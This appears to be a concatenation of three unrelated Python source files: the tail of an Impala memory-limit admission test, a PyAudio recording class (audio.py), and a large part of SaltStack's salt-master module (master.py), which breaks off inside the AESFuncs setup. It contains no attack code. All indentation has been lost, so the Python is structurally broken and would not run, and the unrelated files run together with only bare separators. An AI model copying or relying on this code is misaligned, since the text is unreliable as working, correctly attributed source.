# settings of the OS. It should be fine to continue anyway.
proc_limit = self.get_proc_limit()
if proc_limit != MEM_TEST_LIMIT:
LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit,
MEM_TEST_LIMIT)
self.pool_name = 'default-pool'
# Each query mem limit (set the query option to override the per-host memory
# estimate) should use a bit less than (total pool mem limit) / #queries so that
# once #queries are running, the total pool mem usage is about at the limit and
# additional incoming requests will be rejected. The actual pool limit on the number
# of running requests is very high so that requests are only queued/rejected due to
# the mem limit.
num_impalads = len(self.cluster.impalads)
query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
self.run_admission_test(vector,
{'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
|
audio.py
|
# -*- coding: utf-8 -*-
import os
import sys
from threading import Thread, Lock
from pyaudio import PyAudio, paInt16
import config as conf
class AudioRecorder:
def __init__(self, rate):
self.pa = PyAudio()
self.stream = self.pa.open(
format = paInt16,
channels = 1,
rate = rate,
input = True,
frames_per_buffer = conf.block_size
)
self.stream.stop_stream()
self.rate = rate
self.format = paInt16
def __enter__(self, *args):
return self
def __exit__(self, *args):
self.close()
def start_recording(self):
self.lock = Lock()
self._do_stop_recording = False
def record_func(self):
data = b''
while True:
with self.lock:
if self._do_stop_recording:
break
data += self.record(conf.block_size)
with self.lock:
self._do_stop_recording = False
self._recorded_data = data
self._recorder_thread = Thread(target=record_func, args=(self,))
self._recorder_thread.daemon = True
self._recorder_thread.start()
def finish_recording(self):
sys.stdout.flush()
with self.lock:
sys.stdout.flush()
self._do_stop_recording = True
sys.stdout.flush()
self._recorder_thread.join()
sys.stdout.flush()
return self._recorded_data
def record(self, length):
self.stream.start_stream()
data = self.stream.read(length)
self.stream.stop_stream()
return data
def bytes_to_numseq(self, b):
size = self.pa.get_sample_size(self.format)
i = 0
while i < len(b):
yield int.from_bytes(b[i : i+size], signed=True, byteorder='little')
i += size
def close(self):
self.stream.close()
self.pa.terminate()
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import os
import re
import sys
import time
import errno
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
log = logging.getLogger(__name__)
class SMaster(object):
'''
Create a simple salt-master, this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
'''
Rotate the AES key rotation
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# should be unnecessary-- since no one else should be modifying
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, log_queue=None):
super(FileserverUpdate, self).__init__(log_queue=log_queue)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(state['opts'], log_queue=state['log_queue'])
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
'No update function for the %s filserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.error(
'%s key missing from master configuration. This is '
'a bug, please report it. Falling back to default '
'interval of %d seconds', interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
:param dict: The salt options
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... macOS reports RLIM_INFINITY as
# hard limit,but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
def _pre_flight(self):
'''
Run pre flight checks. If anything in this method fails then the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
# Since there are children having their own ProcessManager we should wait for kill more time.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
:key dict: The user starting the server and the AES key
:mkey dict: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
# Wait for kill should be less then parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, start, cmd):
'''
Calculate the master stats and fire events with stat info
'''
end = time.time()
duration = end - start
self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs']
if end - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = end
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
:param str load: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
ret = self.aes_funcs.run_func(data['cmd'], data)
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
